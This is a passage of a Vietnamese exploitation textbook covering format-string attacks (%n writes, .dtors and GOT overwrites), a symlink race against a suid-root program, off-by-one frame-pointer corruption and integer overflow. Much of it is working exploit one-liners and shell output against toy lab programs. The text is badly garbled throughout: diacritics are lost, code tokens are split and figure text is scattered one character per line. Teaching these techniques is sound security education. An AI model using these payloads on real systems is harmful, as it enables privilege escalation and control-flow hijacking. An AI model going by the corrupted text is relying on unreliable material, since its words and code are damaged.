Chng ta c th ghi vo a ch cao trc khi ghi vo a ch thp khng?
'
&
$
%
Dng c v suy ngh
Cn in thm bao nhiu k t khi in c 78 k t t c mt byte 56
khi ghi?
Chng ta khng c cch gim s lng k t in. Tuy nhin, v chng
ta ch quan tm ti mt byte cui nn 69, hay 169, hay 269, hay 33369 cng
u em li cng mt gi tr byte cui 69. Cc byte d ra s b ln ghi k tip
lp mt, hoc n gin l nm ngoi vng bn byte ca bin cookie ta ang
quan tm. Cng chnh v l do b lp ny nn chng ta khng th khi theo
th t t cao xung thp v ln ghi th hai s ph hng gi tr c ghi
ln ghi th nht, v tng t cng s b ln ghi th ba ph hng.
Da vo nhn xt v s quay vng ca byte cui ny, chng ta s thc hin
bn ln ghi vi cc gi tr ln lt l 78, 156, 234, v 312. Cc gi tr ny m
bo khi ly hiu ca s sau v s trc s cho kt qu khng m. Hnh 4.3 miu
t t m s thay i ca b nh ln lt qua bn ln ghi v cc byte b lem. Cu
lnh tn dng li ca chng ta s tng t nh hnh chp sau.
56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x78-16) + "x%10$n" + "%" + str(0x15
6-0x78) + "x%11$n" + "%" + str(0x234-0x156) + "x%12$n" + "%" + str(0x312-0x234)
+ "x%13$n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#######V#######
0
0
0
6
cookie = 12345678
... XX XX XX XX XX XX XX ...
L!n 1 ... 78 00 00 00 XX XX XX ...
L!n 2 ... 78 56 01 00 00 XX XX ...
L!n 3 ... 78 56 34 02 00 00 XX ...
L!n 4 ... 78 56 34 12 00 00 00 ...
cookie
BFFFF854 BFFFF857
b" thay #$i
cc byte lem
XX khng xc #"nh
Hnh 4.3: Cc ln ghi
Ghi tng byte nh chng ta thc hin ch l mt trong nhng cch ct gi
tr cn ghi thnh nhng phn t nh hn. Hnh 4.4 th hin mt vi cch ct
khc.
2-2 l cch ct tt nht v va s dng t ln ghi nht v m bo khng b lem
khi s dng vi hai nh dng hn. Hnh 4.5a biu din cch hot ng ca
dng lnh python -c print "\x54\xF8\xFF\xBF\x56\xF8\xFF\xBF" +
"%" + str(0x5678 - 8) + "x%10$hn" + "%" + str(0x11234 - 0x5678)
+ "x%11$hn" | ./fmt.
1-1-2 c th c s dng vi nnhn nu chp nhn b lem 1 byte, hay nhn
hn trnh b lem. Hnh 4.5b miu t cch hot ng ca dng lnh python
-c print "\x54\xF8\xFF\xBF\x55\xF8\xFF\xBF" + "\x56\xF8\xFF\xBF"
+ "%" + str(0x78 - 12) + "x%10$n" + "%" + str(0x156 - 0x78) +
"x%11$hn" + "%" + str(0x1234 - 0x156) + "x%12$hn" | ./fmt.
1-1-1-1 l kiu ct c bn nht c chng ta trnh by y. Kiu ct ny
s b lem t nht 1 byte, v nhiu nht l 3 byte ty theo s phi hp ca
nh dng n v hn.
4.4.7 Mang gi tr 0x04030201
cookie mang gi tr 04030201 th bn byte bt u t v tr bin cookie s
phi c gi tr 01, 02, 03, 04. Chng ta s s dng cch ct 1-1-1-1 do bn
gi tr cn ghi s l 101, 102 103, 104. Bn c thy rng ch gi tr u tin
nh hn 16 (thp phn) k t xc nh 4 a ch nn mi c chuyn thnh
2
1
4
3
6
5
8
7
2
1
1
-
1
-
1
-
1
2
1
4
3
2
-
2
2
1
1
-
1
-
2
2
1
1
-
2
-
2
4
3
6
5
8
7
6
5
8
7
4
3
6
5
8
7
4
3
X
X
6
5
8
7
B
F
F
F
F
8
5
4
B
F
F
F
F
8
5
7
H
n
h
4
.
4
:
C
c
c
c
h
c
t
t
h
n
g
d
n
g
... XX XX XX XX ...
L!n 1 ... 78 56 XX XX ...
L!n 2 ... 78 56 34 12 ...
cookie
BFFFF854 BFFFF857
(a) Ct 2-2 vi hn
... XX XX XX XX ...
L!n 1 ... 78 00 00 00 ...
L!n 2 ... 78 56 01 00 ...
L!n 3 ... 78 56 34 12 ...
cookie
BFFFF854 BFFFF857
(b) Ct 1-2-2 vi n-hn-hn
Hnh 4.5: Cc cch ct
101. Cc gi tr khc ch n gin l cng dn vo gi tr trc n m bo
byte cui ph hp vi gi tr mong mun.
Dng lnh tn dng ca chng ta tng t nh hnh chp di.
56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x101-16) + "x%10$n" + "%" + str(0x1
02-0x101) + "x%11$n" + "%" + str(0x103-0x102) + "x%12$n" + "%" + str(0x104-0x103
) + "x%13$n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#######V#######
0006
cookie = 04030201
Nu bn c ng vi dng lnh tn dng trn th bn qun mt nhng
g chng ta bn n trong Tiu mc 4.4.3. m bo di ca chui lun
lun chnh xc, mi xc nh di trong yu cu nh dng phi t nht c
gi tr l di ti a ca kiu d liu c in. Trong v d ny, %x s in ti a
8 k t do chng ta ch nn dng %x vi xc nh di ln hn hoc bng
8. V 102 101 = 1 v cng nh 103 102 = 1, 104 103 = 1 nh hn 8 nn
chng ta s thay th cm %x vi mt k t bt k.
56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x101-16) + "x%10$n" + "a%11$n" + "a
%12$n" + "a%13$n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#######V#######
0aaa
cookie = 04030201
4.4.8 Lp li vi chui nhp bt u bng BLUE MOON
Chng ta s lp li v d trn vi yu cu chui nhp vo c bt u bng 9
k t BLUEMOON. Khi chui nhp vo bt u vi 9 k t ny, trng thi ngn
xp ca chng ta s nh trong Hnh 4.6.
V tham s th 10, 11, v 12 b chui BLUE MOON chim mt nn chng
ta ch c th bt u s dng t tham s 13. Do , cc tham s 10, 11, 12,
13 v d trc s cn i thnh 13, 14, 15, 16. Hn na, chui BLUE MOON ch
chim 1 byte ca tham s 12 nn chng ta cng cn thm 3 k t bt k
lp ch trng ny. Cui cng, v in c thm C (9 + 3) byte nn cng thc
tnh ton s lng cn c iu chnh theo. Tm li, chui tn dng ca chng
ta s gm 9 k t BLUE MOON nh yu cu, 3 k t bt k lp tham s 12,
theo sau bi 16 k t xc nh 4 a ch, theo sau bi nh dng x vi di
101 C 10, ri nh dng n vi tham s 13, mt k t bt k, nh dng n
vi tham s 14, v tng t vi tham s 15, 16.
...
4E XX XX XX
20 4D 4F 4F
42 4C 55 45
...
tham s! 10
"BLUE"
tham s! 12
Hnh 4.6: Vi chui BLUE MOON trc
regular@exploitation:~/src$ python -c print "BLUE MOON \x54\xF8\xFF\xBF\x55\x
F8\xFF\xBF\x56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x101-12-16) + "x%13$n"
+ "a%14$n" + "a%15$n" + "a%16$n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
BLUE MOON T#######V#######
0aaa
cookie = 04030201
4.4.9 Mang gi tr 0x69696969
Tri qua cc v d trc, c l c gi c th t thc hin c vic ghi gi
tr bt k vo bin cookie. Mc ny c th c xem nh mt bi tp nh dnh
cho bn c. Hy thc hin vic ghi gi tr 69696969 vo bin cookie v so snh
lnh tn dng li ca bn vi lnh c gi chn trang
2
.
Dng c v suy ngh

Sau khi so snh, c gi c hiu cch hot ng ca lnh c gi khng?
4.5 Phn on .dtors
Qua cc v d thit lp gi tr bin cookie trnh by, chng ta nhn ra rng
ngoi vic qut ngn xp, chng ta cn c th vit mt gi tr bt k vo mt
vng nh bt k thng qua li chui nh dng. Cu hi c t ra s l kh
nng ny gip c g cho vic tn dng li.
2
python -c print "\x54\xF8\xFF\xBF\x56\xF8\xFF\xBF" + "%" + str(0x6969-8) +
"x%10$n%11$n" | ./fmt
4.5. PHN ON .DTORS 89
2
3 stati c void de s t r uc t or ( void) __attribute__( ( de s t r uc t or ) ) ;
4
5 void de s t r uc t or ( void)
6 {
7 return ;
8 }
9
10 stati c void easter_egg ( void)
11 {
12 puts ( "Youwin ! " ) ;
13 }
14
16 {
17 char buf [ 5 1 2 ] ;
18 f g e t s ( buf , si zeof ( buf ) , s t di n ) ;
19 pr i nt f ( buf ) ;
20 pr i nt f ( "Goodbye ! \ n" ) ;
21 return 0;
22 }
Ngun 4.2: dtors.c
Tng t nh kho st trong Chng 3, chng ta c th s dng li chui
nh dng thay i gi tr mt bin quan trng trong chng trnh, hoc thay
i a ch tr v ca mt hm. Ngoi nhng con ng tn dng ra, chng
ta cn c nhng im tn dng khc l danh sch cc hm hy (destructor) v
bng a ch hm c lin kt.
Hy cng xem xt v d ti Ngun 4.2.
Hm hy l mt hm khng nhn i s, khng c gi tr tr v, v c
khai bo trong GCC vi __attribute__((destructor)). Hm hy lun lun
c b np ca h thng gi khi chng trnh kt thc, cho d l kt thc
thng thng, kt thc qua hm exit, hay v xy ra li.
Danh sch cc hm hy ca mt chng trnh c lu trong phn on
.dtors ca chng trnh . Danh sch ny bt u bng k hiu nhn dng
FFFFFFFF v kt thc vi gi tr 00000000. Mi phn t ca danh sch l
a ch ca mt hm hy. Khi chng trnh kt thc, b np s c danh sch
ny v ln lt gi cc hm hy trong danh sch cho n khi kt thc. Cho d
chng trnh c hay khng c hm hy, danh sch ny vn lun tn ti trong
chng trnh.
xem danh sch cc hm hy ca mt chng trnh, chng ta s dng
cng c objdump nh trong hnh chp.
regular@exploitation:~/src$ objdump -S -j .dtors dtors
dtors: file format elf32-i386
Disassembly of section .dtors:
08049694 <__DTOR_LIST__>:
8049694: ff ff ff ff d0 84 04 08 ........
0804969c <__DTOR_END__>:
804969c: 00 00 00 00 ....
Ti a ch 08049694 l k hiu bt u ca danh sch hm hy. Bn byte
k tip l a ch ca mt hm hy. Hm ny nm ti 080484D0. Bn byte sau
cng ti a ch 0804969C l du hiu kt thc danh sch hm hy.
Nh vy, nu nh ta thay i a ch ca hm hy trong danh sch ny bng
a ch ca m lnh ca chng ta th khi chng trnh kt thc, chnh m lnh
ca chng ta s c thc thi. Trong trng hp chng trnh khng c hm
hy th chng ta cng c th thay i du hiu kt thc danh sch bng a ch
m lnh ca chng ta. i vi v d ny, chng ta c hai a ch ghi l
08049698 v 0804969C.
Mt trong ba vn quan trng trong vic tn dng li chui nh dng
c gii quyt. K n chng ta phi tr li c cu hi lm sao truyn tham
s vo chui nh dng. lm vic ny, chng ta s xem xem khi no th printf
gp li chui nhp tng t nh trong Mc 4.3.
regular@exploitation:~/src$ ./dtors
AAAA %x %x %x %x %x %x
AAAA 200 b7fdb300 51 0 0 41414141
Good bye!
Nh vy chng ta c th bt u truyn tham s cho cc yu cu nh dng
t v tr s 6. Ch cn li mt n s l gi tr m chng ta mun ghi vo a
ch 08049698. Chng ta c th t m lnh trong mt bin mi trng, v s
dng a ch ca bin mi trng ny. Nhng trnh cp n vic t to
m lnh, v d ca chng ta c sn nhng dng lnh theo ng mc ch
hm easter_egg. Chng ta c th s dng a ch ca hm ny.
tm a ch hm easter_egg, chng ta s dng objdump hoc GDB.
regular@exploitation:~/src$ objdump -d dtors | grep easter_egg
080484e0 <easter_egg>:
Hm easter_egg nm ti a ch 080484E0. Tng t vi GDB nh trong
hnh chp bn di.
4.5. PHN ON .DTORS 91
regular@exploitation:~/src$ gdb ./dtors
gdb$ print easter_egg
$1 = {<text variable, no debug info>} 0x80484e0 <easter_egg>
gdb$
Nh vy, chng ta s dng dng lnh sau thay i a ch hm hy trong
danh sch hm hy vi a ch ca hm easter_egg.
regular@exploitation:~/src$ python -c print "\x98\x96\x04\x08\x99\x96\x04\x08\x
9A\x96\x04\x08\x9B\x96\x04\x08" + "%" + str(0xE0 - 16) + "x%6$n" + "%" + str(0x1
84 - 0xE0) + "x%7$n" + "%" + str(0x204 - 0x184) + "x%8$n" + "aaaa%9$n" | ./dtor
s
####
200
b7fdb300
51aaaa
Good bye!
You win!
Segmentation fault
Dng c v suy ngh

Ti sao ta vng li phn on?
Vi cu lnh tn dng trn, chng ta s dng cch ct 1-1-1-1, lm lem
3 byte qua du hiu kt thc danh sch hm hy. Sau khi thc hin xong hm
easter_egg, b np s tip tc duyt danh sch cho ti khi gp du hiu kt
thc. V du hiu kt thc b chng ta v tnh thay i nn b np s xem
gi tr nh mt hm hy v tip tc gi hm hy ny. ng tic, a ch
hm hy bt c d ny khng phi l mt a ch c nh x nn chng
trnh vng phi li phn on.
Chng ta c th gii quyt li phn on ny bng cch s dng cch ct
2-2 vi hn, hoc cc cch ct khng lem khc. y s l mt th thch nh dnh
cho c gi. Bn c cng c th th thay th gi tr ti a ch du hiu kt
thc danh sch hm hy.
4.6 Bng GOT
Khi mt chng trnh s dng cc hm ca mt th vin (v d nh hm printf
ca th vin chun), chng trnh s phi thng bo cho b np bit hm
n cn l hm g, v c tm thy th vin no. B np nhn c thng tin
ny s thc hin vic np th vin v tm a ch ca hm cn dng truyn
li cho chng trnh. Qu trnh ny c thc hin khi hm c gi ln u
v a ch hm s c lu li s dng trong cc ln gi sau. Bng lu cc
a ch hm c b np tm ra c gi l bng a ch ton cc (global
offset table, hay GOT).
y l mt mc tiu tn dng ca chng ta v chng ta c th sa a ch
trong GOT khi chng trnh gi ti hm b sa th m lnh ca chng
ta s c thc thi. Trong Ngun 4.2, sau khi thc hin lnh printf(buffer),
chng trnh thc hin tip lnh printf(Good bye). C hai yu t cn bn
tn cng GOT u c . Yu t th nht l chng trnh tip tc gi mt
hm sau khi thc hin hm b li (printf(buffer)). Yu t th hai l hm
c gi ny c b np tm ra v lu trong GOT (chnh l hm printf).
Chng ta vn cn tr li hai cu hi quan trng ca vic tn dng li chui
nh dng l ghi gi tr g vo a ch no. Nh lc trc, chng ta s ghi a ch
ca hm easter_egg. Vn cn li l tm c cha a ch ca hm printf
trong GOT.
c GOT, chng ta c th dng cng c objdump nh hnh chp bn
di.
regular@exploitation:~/src$ objdump -R dtorsdtors: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
080497a0 R_386_COPY stdin
08049774 R_386_JUMP_SLOT __register_frame_info
08049778 R_386_JUMP_SLOT puts
0804977c R_386_JUMP_SLOT __deregister_frame_info
08049780 R_386_JUMP_SLOT fgets
08049784 R_386_JUMP_SLOT __libc_start_main
08049788 R_386_JUMP_SLOT printf
0804978c R_386_JUMP_SLOT __gmon_start__
Ct th nht l a ch nh cha a ch ca hm tng ng ct th ba
m c b np tm ra. V chng ta mun sa a ch ca printf nn chng
ta s sa nh 08049788.
Vi ba yu t cn bn c gii quyt, chng ta c th tin hnh tn
dng li chui nh dng thay a ch hm printf vi a ch hm easter_egg
nh hnh chp sau.
regular@exploitation:~/src$ python -c print "\x88\x97\x04\x08\x89\x97\x04\x08\x
8A\x97\x04\x08\x8B\x97\x04\x08" + "%" + str(0xE0 - 16) + "x%6$n" + "%" + str(0x1
84 - 0xE0) + "x%7$n" + "%" + str(0x204 - 0x184) + "x%8$n" + "aaaa%9$n" | ./dtor
s
####
200
b7fdb300
51aaaa
You win!
Nu ch , c gi s thy c ch khng n vi phng hng ny. Hm
printf c gi ln th hai vi mt tham s, trong khi hm easter_egg khng
nhn tham s. iu ny gy ra s khng thng nht gia tc v gi hm (vi
thao tc chun b vng nh ngn xp) v tc v dn dp vng nh ngn xp
sau khi hm tr v. i vi quy c gi hm (calling convention) cdecl (quy
c mc nh ca hu ht cc trnh bin dch v c dng bin dch b th
vin chun), vic ny khng nh hng n kt qu chung. Tuy nhin, vi cc
quy c gi hm khc chng hn nh stdcall th rt c th chng ta s gp li
phn on.
4.7 Tm tt v ghi nh
Chui nh dng l tham s th nht c truyn vo hm printf. N
cha cc yu cu nh dng xc nh cch thc d liu s c hin
th bi hm printf.
Mi yu cu nh dng bt u bng k t phn trm (%) v kt thc bi
k t nh dng. C nhiu k t nh dng nh x, n, v hn. Gia k t
phn trm v k t nh dng c th c thm cc ty chn khc.
Yu cu nh dng n v hn ghi vo vng nh ch ti bi tham s ca n
s lng k t c in. im khc bit ch hai nh dng ny l n ghi
trn 4 byte, trong khi hn ghi 2 byte thp.
Ty chn di ca yu cu nh dng l mt chui ch s thp phn
bt u bng ch s khc 0. Ty chn xc nh v tr tham s cho yu
cu nh dng l mt chui ch s thp phn nguyn dng theo sau bi
k t ng ($). Ty chn xc nh v tr tham s phi i ngay sau k t
phn trm.
Khi x dng ty chn xc nh di, chng ta nn dng di ln hn
hoc bng vi di ti a hin th kiu d liu. Ty chn di gip
chng ta nhp vo t nhng nhn c nhiu k t xut ra.
Li chui nh dng cho php chng ta qut ngn xp v xc nh cc gi
tr ang c trn ngn xp. Nu d liu nhp ca ta cng nm trn ngn
xp th s c trng hp chng ta gp li chnh d liu nhp. iu ny
cho php chng ta iu khin tham s truyn vo yu cu nh dng.
Ty vo gi tr cn ghi, chng ta c th s dng cch ct 1-1-1-1, hoc
2-2 ghi tng phn nh ca gi tr qua nhiu nh dng n hoc hn
thay v ghi mt ln trc tip.
Vic tn dng li chui nh dng cho php ta ghi mt gi tr bt k vo
mt vng nh bt k. Vng nh c th l mt phn t trong danh sch
hm hy hoc GOT.
Hm hy l mt hm khng nhn tham s, khng c gi tr tr v, v
lun lun c b np thc thi khi chng trnh kt thc.
Danh sch hm hy bt u bng k hiu bt u danh sch FFFFFFFF
v kt thc vi k hiu kt thc danh sch 00000000. Cc gi tr gia
l a ch ca cc hm hy. D chng trnh s dng hay khng s dng
hm hy, danh sch hm hy lun lun c mt trong chng trnh.
Cc chng trnh lin kt ng ti nhng th vin khc s nh b np tm
a ch hm cn thit. Sau khi b np tm c a ch hm, chng
trnh s lu li a ch ny trong GOT s dng trong nhng ln gi
hm sau.
Chng ta c th xem xt danh sch hm hy v GOT thng qua cng c
objdump.
Chng 5
Mt s loi li khc
Ngoi cc loi li trn b m, v chui nh dng ph bin v xng ng c
xem xt mt cch chi tit trong hai chng trc, chng ta i khi cn gp phi
nhng li kh pht hin nh trng hp ua, hoc nhng trng hp li c
bit ca cc li bn nh li d mt, hay cc li lin quan n cu trc my
tnh nh li trn s nguyn.
Cc li ny, mc d kh b tn dng v t khi gp phi, nhng tc hi ca
chng cng nghim trng v cng. Trong nhng nm cui th k 20, hng lot
li tng t b pht hin trong cc h thng UNIX v hu qu l cc h
thng quan trng trn mng ton cu b xm nhp. Chnh v tc hi to ln
m chng ta s cn xem xt k nguyn nhn gy li, cch thc tn dng, v
bin php phng trnh chng.
5.1 Trng hp ua (race condition)
Trng hp ua xy ra khi nhiu tin trnh truy cp v sa i cng mt d liu
vo cng mt lc, v kt qu ca vic thc thi ph thuc vo th t ca vic
truy cp. Nu mt chng trnh vng phi li ny, ngi tn dng li c th
chy nhiu tin trnh song song ua vi chng trnh c li, vi mc ch l
thay i hot ng ca chng trnh y. i khi, trng hp ua cn c bit
n vi tn gi thi im kim tra/thi im s dng (Time Of Check/Time Of
Use, TOC/TOU)
Nu trong Chng 3 chng ta thy qua hai cu hi chnh ca vic tn
dng li l cn nhp g v cch nhp d liu y vo chng trnh, th y
chng ta gp cu hi quan trng th ba l khi no th nhp d liu vo chng
trnh. Mt chng trnh c th khng nhn d liu cho n khi mt s yu cu
c tha mn, v ch nhn d liu trong mt khong thi gian ngn. Xc nh
c thi im nhp liu chnh xc do tr thnh mt vn cn bn.
Hy xem xt v d trong Ngun 5.1. Chng ta cn to mt mi trng hot
ng cho chng trnh ny n c thm tnh thuyt phc. Trc ht chng ta
cn gn quyn suid root cho chng trnh.
95
96 CHNG 5. MT S LOI LI KHC
1 #include <s t dl i b . h>
3 #include <uni s t d . h>
4
6 {
7 FILE f i l e ;
8 char buf f e r [ 2 5 6 ] ;
9 i f ( ac c e s s ( argv [ 1 ] , R_OK) == 0)
10 {
11 us l ee p ( 1 ) ;
12 f i l e = f open ( argv [ 1 ] , " r " ) ;
13 i f ( f i l e == NULL)
14 {
15 goto cl eanup ;
16 }
17 f g e t s ( buf f er , si zeof ( buf f e r ) , f i l e ) ;
18 f c l o s e ( f i l e ) ;
19 puts ( buf f e r ) ;
20 return 0;
21 }
22 cl eanup :
23 per r or ( "Cannotopen f i l e " ) ;
24 return 0;
25 }
Ngun 5.1: race.c
regular@exploitation:~/src$ gcc -o race race.c
regular@exploitation:~/src$ sudo chown root:root race
regular@exploitation:~/src$ sudo chmod u+s race
regular@exploitation:~/src$ ls -l race
-rwsr-xr-x 1 root root 8153 2009-02-28 14:30 race
Sau ta s to mt tp tin thuc v root m bo ch c root mi c
c tp tin ny. Ni dung tp tin l dng ch You win!.
regular@exploitation:~/src$ echo You win! > race.txt
regular@exploitation:~/src$ cat race.txt
You win!
regular@exploitation:~/src$ sudo chown root:root race.txt
regular@exploitation:~/src$ sudo chmod 600 race.txt
regular@exploitation:~/src$ ls -l race.txt
-rw------- 1 root root 9 2009-02-28 14:37 race.txt
regular@exploitation:~/src$ cat race.txt
cat: race.txt: Permission denied
Chng trnh v d c ni dung ca mt tp tin c tn l tham s dng
lnh u tin v in ni dung tp tin ra mn hnh. Do chng trnh ny c
5.1. TRNG HP UA (RACE CONDITION) 97
access
fopen
ti!n trnh
khc
chuy!n
chuy!n
Hnh 5.1: iu kin ua
t suid root nn hm fopen s c th c c ni dung ca bt k tp tin no.
V khng th mt ngi dng thng thng c ni dung ca cc tp tin
nhy cm (v d nh tp tin race.txt), chng trnh v d s dng thm
hm access kim tra xem ngi dng thc t c th c tp tin ny khng.
regular@exploitation:~/src$ ./race race.txt
Cannot open file: Permission denied
regular@exploitation:~/src$ sudo ./race race.txt
You win!
Vn vi chng trnh ny l hm access v hm fopen khng thc hin
hai tc v kim tra quyn v m tp tin mt cch khng th tch ri (atomic).
Ni mt cch khc, c mt khong thi gian ngn gia hm access v hm fopen
m h iu hnh c th chuyn qua thc thi mt tin trnh khc, ri quay li
nh trong Hnh 5.1.
Nu nh sau khi hm access b vt qua v tin trnh song song kia c
th thay i tp tin s c m bi hm fopen th ngi dng thng thng c
th c c ni dung ca bt k tp tin no trn my tnh. iu ny c th
t c v c hai hm access v fopen u nhn tham s l tn tp tin. Tn
tp tin abc khng nht thit phi lun l tp tin abc v chng ta c th to
mt lin kt mm c tn abc nhng ch n tp tin khc. Do tng tn
dng ca chng ta gm cc bc sau:
1. To mt lin kt tn raceexp ch n mt tp tin chng ta c th c v
d nh race.c.
2. Thc thi chng trnh b li vi tham s raceexp chng trnh ny
kim tra kh nng c tp tin raceexp, m tht cht l tp tin race.c.
1 #! / bi n/sh
2 while [ [ true ] ]
3 do
4 rm r f raceexp
5 l n s r ace . c raceexp
6 rm r f raceexp
7 l n s r ace . t xt raceexp
8 done
Ngun 5.2: raceexp.sh
3. Nu may mn, h iu hnh chuyn quyn thc thi li cho tin trnh c
to bc 1 ngay sau khi tin trnh bc 2 hon thnh vic kim tra,
th chng ta s chuyn lin kt raceexp ch n tp tin race.txt.
4. H iu hnh chuyn li tin trnh b li, v hm fopen m tp tin raceexp
m by gi tht ra l tp tin race.txt.
ti u vic tn dng, chng ta s t cc tc v chuyn i lin kt mm
trong mt kch bn nh Ngun 5.2. Chng ta s thc thi on kch bn ny
ch nn (background). ch cnh (foreground), chng ta s thc hin
lnh gi chng trnh b li. Sau mt t ln gi, chng ta s c c ni dung
ca tp tin race.txt. Khi hon thnh vic tn dng li, chng ta cn kt thc
kch bn c chy nn.
regular@exploitation:~/src$ sh raceexp.sh &
[1] 3951
regular@exploitation:~/src$ ./race raceexp
#include <stdlib.h>
Cannot open file: Permission denied
Cannot open file: No such file or directory
You win!
regular@exploitation:~/src$ kill 3951
c gi tinh mt s cm thy v d ny khng tht t v chng ta chn
dng lnh usleep(1) trong Ngun 5.1 buc h iu hnh chuyn tin trnh.
Trn nguyn tc, nu khng c dng lnh gi hm usleep th h iu hnh vn
chuyn tin trnh, mc d chng ta khng th on c vo thi im no.
Tuy nhin, iu ny khng lm thay i vic tn dng li, chng ta s vn c
c ni dung ca tp tin race.txt sau mt s ln chy. Dng lnh gi hm
usleep y ch n gin lm v d d b tn dng hn mt cht.
Li trng hp ua thng gp nhiu trong cc ng dng x l tp tin,
hoc truy cp c s d liu. Cc ti nguyn ny c dng chung bi nhiu tin
trnh, hoc tiu trnh (thread) ca cng mt tin trnh nn rt d xy ra cc
cuc ua ginh quyn s dng. Cch thng thng nht trnh li l tun
5.2. D MT (OFF BY ONE) 99
1 #define MAX 8
2
3 i nt vul n_func ( char arg )
4 {
5 char buf [MAX] ;
6 s t r cpy ( buf , arg ) ;
7 }
8
10 {
11 i f ( argc < 2)
12 {
13 return 0;
14 }
15 i f ( s t r l e n ( argv [ 1 ] ) > MAX)
16 {
17 argv [ 1 ] [MAX] = \x00 ;
18 }
19 vul n_func ( argv [ 1 ] ) ;
20 return 0;
21 }
Ngun 5.3: off_by_one.c
t ha (serialize) truy cp vo nhng ti nguyn ny, vi cc kha (lock), hoc
c hiu (semaphore).
5.2 D mt (off by one)
D mt l li xy ra khi chng ta x l d mt phn t. V d in hnh ca
loi li ny l trn b m vi ch 1 byte d liu b trn. Tuy nhin, vi 1 byte
ny, chng ta c th iu khin c lung thc thi ca chng trnh. Hy xem
xt Ngun 5.3.
Hm vuln_func chp d liu t tham s arg vo bin ni b buf. Trong hm
main, chui tham s dng lnh th nht c m bo ch di ti a 8 k t
trc khi truyn vo vuln_func. C v nh mi th u chun xc v bin buf
cng cha c ti a 8 k t. Tuy nhin chng ta qun rng hm strcpy s
t ng thm vo mt k t NUL cui chui. Nu chui tham s c 8 k t
(v d nh AAAAAAAA) th strcpy s chp 8 k t ny vo buf, v vit thm 1 k
t NUL vo cui. K t NUL ny ln con tr vng nh ca main nh miu
t trong Hnh 5.2.
Khi hm vuln_func vo phn kt thc, v lnh POP EBP nn gi tr XXXXXX00
s c gn vo thanh ghi EBP, v hm vuln_func quay tr v hm main.
n khi main vo phn kt thc, v lnh MOV ESP, EBP nn gi tr XXXXXX00
li c chuyn sang cho thanh ghi ESP. Sau MOV ESP, EBP l lnh POP EBP
nn mt ngn xp s b b qua, con tr ngn xp s c gi tr XXXXXX04.
Ti lnh RET th gi tr ca ngn xp hin ti c gn vo con tr lnh v
lung thc thi b thay i.
...
arg
!"a ch# tr$ v%
00 XX XX XX
41 41 41 41
41 41 41 41
...
Hnh 5.2: NUL ln EBP c
...
arg
!"a ch# tr$ v% c&a vuln_func
00 XX XX XX
!"a ch# tr$ v% c&a main
41 41 41 41
...
&buf=XXXXXX00
Hnh 5.3: EBP lu ca main ch ti buf
Chng ta nhn thy rng li xy ra trong vuln_func nhng lung thc thi
ch b thay i khi main kt thc. im ng ch th hai l khi b k t NUL
ln, gi tr EBP mi s nh hn gi tr EBP c, tc EBP s ch ti mt a
im bn di.
Nu nh bin buf nm ti a ch c byte cui l 00 th khi k t NUL lem
ti gi tr EBP ca main lu trn vng nh ngn xp hm vuln_func s lm
cho gi tr ny ch ti chnh bin buf. Do , a ch tr v ca main s b quy
nh bi bn byte bt u t v tr ca buf[4]. Hnh 5.3 minh ha hon cnh
ny.
V tham s dng lnh c t trn ngn xp nn s thay i tham s dng
lnh s dn n s thay i v tr ca bin ni b. Chng ta s th vi mt vi
gi tr tham s dng lnh tm ra trng hp bin buf c a ch tn dng l
00.
5.3. TRN S NGUYN (INTEGER OVERFLOW) 101
regular@exploitation:~/src$ ./off_by_one aaaaaaaa
&buf: 0xbffffa10
Segmentation fault
regular@exploitation:~/src$ ./off_by_one aaaaaaaaaaaaaaaaa
&buf: 0xbffffa10
Segmentation fault
regular@exploitation:~/src$ ./off_by_one aaaaaaaaaaaaaaaaaaaaaaa
&buf: 0xbffffa00
Segmentation fault
Chng ta pht hin ra rng vi chui tham s aaaaaaaaaaaaaaaaaaaaaaa
th bin buf nm ti v tr tha yu cu. Chng ta cng c th thay i bin
mi trng, hoc tn chng trnh, hoc cc gi tr khc c lu trn ngn xp
lm thay i v tr bin buf. Chui tham s chng ta tm c y khng
nht thit l gi tr duy nht, c gi c th s tm thy mt chui khc.
Nh vy, chng ta ch cn t a ch ca hm easter_egg sau 4 byte u, v
gi s lng k t ca chui tham s nh c l main s quay li easter_egg, kt
thc vic tn dng li d mt. a ch hm easter_egg c th c tm thng
qua cng c objdump hoc GDB nh c trnh by trong Mc 4.5. Hm
ny nm ti a ch 08048510.
regular@exploitation:~/src$ ./off_by_one python -c print "aaaa\x10\x85\x04\x08
aaaaaaaaaaaaaaa"
&buf: 0xbffffa00
You win!
5.3 Trn s nguyn (integer overflow)
Trong Tiu mc 4.4.6, chng ta li dng vic quay vng ca mt byte ca
s nguyn, v l mt v d ca trn s nguyn. Li trn s nguyn xy ra khi
mt tc v s hc to ra mt gi tr s nm ngoi khong c th c biu
din bi kiu d liu. V d nh khi c cng 1, kiu unsigned int s quay
vng t FFFFFFFF thnh 00000000, trong khi kiu unsigned char quay vng
t FF thnh 00. Ngoi ra, vi cc kiu c du, gi tr cng b quay vng t s
dng thnh s m. V d kiu int s quay vng t 2147483647 (thp phn, hay
7FFFFFFF thp lc phn) thnh -2147483648 (thp phn, hay 80000000 thp
lc phn). Bn c ch rng gi tr tuyt i ca gi tr m nh nht khng
phi l gi tr dng ln nht. iu ny cng gy trn s nguyn khi thc hin
php ly gi tr m (2147483648) = 2147483648.
Dng 15 trong Ngun 5.4 b li trn s nguyn v hm atoi tr v kt qu
kiu int trong khi bin len ch c th nhn gi tr theo kiu short. Do , khi
tham s dng lnh l mt s ln hn 32767 thp phn (7FFF thp lc phn)
th len s c gi tr m. V mang gi tr m nn iu kin dng 16 s khng
ng, chng trnh tip tc thc hin vic c t b nhp chun vo chui buf
qua lnh fgets. Tham s th hai ca hm fgets l kiu int. Kt qu ca tc v
len & 0xFFFF i vi kiu int s l mt s nguyn khng m c gi tr t 0 n
65535. dng ny, gi tr m ca len li c s dng nh mt gi tr dng,
dn n vic fgets c vo nhiu k t hn l mng buf c th nhn, gy ra li
2 #include <s t dl i b . h>
3 #include <uni s t d . h>
4
5 #define SIZE 256
6
8 {
